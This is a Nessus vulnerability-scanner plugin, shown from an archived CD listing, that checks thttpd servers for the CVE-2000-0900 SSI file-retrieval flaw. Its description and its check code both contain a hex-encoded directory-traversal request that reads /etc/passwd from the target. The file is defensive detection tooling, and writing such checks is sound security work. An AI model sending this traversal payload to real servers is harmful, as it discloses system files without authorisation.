home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / thttpd_ssi.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  73 lines

  1. #
  2. # This script was written by Thomas Reinke <reinke@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10523);
  10.  script_bugtraq_id(1737);
  11.  script_version ("$Revision: 1.17 $");
  12.  script_cve_id("CVE-2000-0900");
  13.  
  14.  name["english"] = "thttpd ssi file retrieval";
  15.  script_name(english:name["english"]);
  16.  
  17.  desc["english"] = "The remote HTTP server
  18. allows an attacker to read arbitrary files
  19. on the remote web server,  by employing a
  20. weakness in an included ssi package, by
  21. prepending pathnames with %2e%2e/ (hex-
  22. encoded ../) to the pathname.
  23. Example:
  24.     GET /cgi-bin/ssi//%2e%2e/%2e%2e/etc/passwd 
  25.  
  26. will return /etc/passwd.
  27.  
  28. Solution: upgrade to version 2.20 of thttpd.
  29.  
  30. Risk factor : High";
  31.  
  32.  script_description(english:desc["english"]);
  33.  
  34.  summary["english"] = "thttpd ssi flaw";
  35.  script_summary(english:summary["english"]);
  36.  
  37.  script_category(ACT_GATHER_INFO);
  38.  
  39.  
  40.  script_copyright(english:"This script is Copyright (C) 2000 Thomas Reinke");
  41.  family["english"] = "Remote file access";
  42.  script_family(english:family["english"]);
  43.  script_dependencie("find_service.nes", "http_version.nasl");
  44.  script_require_ports("Services/www", 80);
  45.  exit(0);
  46. }
  47.  
  48. #
  49. # The script code starts here
  50. #
  51.  
  52. include("http_func.inc");
  53. include("http_keepalive.inc");
  54.  
  55.  
  56. port = get_http_port(default:80);
  57.  
  58.  
  59. if(!get_port_state(port))exit(0);
  60.  
  61.  
  62. foreach dir (cgi_dirs())
  63. {
  64.  buf = http_get(item:string(dir, "/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"),
  65.         port:port);
  66.  rep = http_keepalive_send_recv(port:port, data:buf);
  67.  if( rep == NULL ) exit(0);
  68.  if(egrep(pattern:".*root:.*:0:[01]", string:rep)){
  69.      security_hole(port);
  70.     exit(0);
  71.     }
  72. }
  73.